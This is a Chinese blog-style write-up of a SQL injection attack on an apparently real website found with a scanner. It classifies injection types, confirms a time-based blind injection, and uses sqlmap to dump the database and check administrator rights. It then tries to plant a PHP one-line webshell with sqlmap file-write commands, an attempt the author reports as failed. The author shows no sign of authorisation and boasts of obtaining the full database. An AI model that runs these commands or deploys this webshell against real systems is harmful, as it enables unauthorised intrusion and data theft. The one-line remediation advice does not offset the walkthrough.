警告
请勿使用本文提到的内容违反法律。 本文不提供任何担保。
一、sql注入介绍及分类 sql 注入就是一种通过操作输入来修改后台操作语句达到执行恶意 sql 语句来进行攻击的技术。
按变量类型分:
? 数字型
? 字符型
按 HTTP 提交方式分
? GET 注入
? POST 注入
? Cookie 注入
按注入方式分? 报错注入
? 盲注
? 布尔盲注
? 时间盲注
? union 注入
编码问题? 宽字节注入
二、awvs扫描结果 ?初步判断可以看出是个时间盲注。
三、漏洞复现 放在bp进行尝试 发现的确是等待6秒后收到信息,可以判断百分之百存在了!
把它放到sqlmap进行一把梭,看不看能不能行
成功爆出数据库名,复现成功!
下面开始进行后渗透,看能不能拿到shell?首先判断是不是权限,看是不是管理员权限
命令:sqlmap.py -u URL --is-dba? ? ? ? ? ? (--is-dba 判断权限)
可以看出是管理员权限,不过他是sql数据库,也是第一次遇到!?
sqlmap一把梭的时候也得出是报错注入,bp试一下能不能看到绝对路径
?巧了,运维人员把把着我的意,得到了网站的根目录了本来用 --os-shell方式的? 这里我直接给舍去? 换种方式首先写个PHP一句话木马<?php eval($_REQUEST[xiaofeng]);?>? ?写进文档1.txt ,然后再把文档放进sqlmap的目录下就可以? ?xiaofeng是连接木马密码。
介绍两个函数:? --file-write(写入指定的文件)? 和? ? --file-dest(写入目标路径)
命令是: sqlmap.py -u URL --file-write 1.txt --file-dest?绝对路径1.php
结果出错了,试了好久也没成功,翻译一下看看?
?之前成功是基于mysql数据库,sql数据库也是第一次遇到,算了最后也放弃了,至少拿到了整个数据库资料,并且是管理员权限。四、漏洞修复
严格过滤用户输入字符,修改数据库权限
警告
请勿使用本文提到的内容违反法律。 本文不提供任何担保。
1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,会注明原创字样,如未注明都非原创,如有侵权请联系删除!;3.作者投稿可能会经我们编辑修改或补充;4.本站不提供任何储存功能只提供收集或者投稿人的网盘链接。 |
标签: #本文不提供任何担保 #一sql注入介绍及分类sql #SQL #语句来进行攻击的技术 #按变量类型分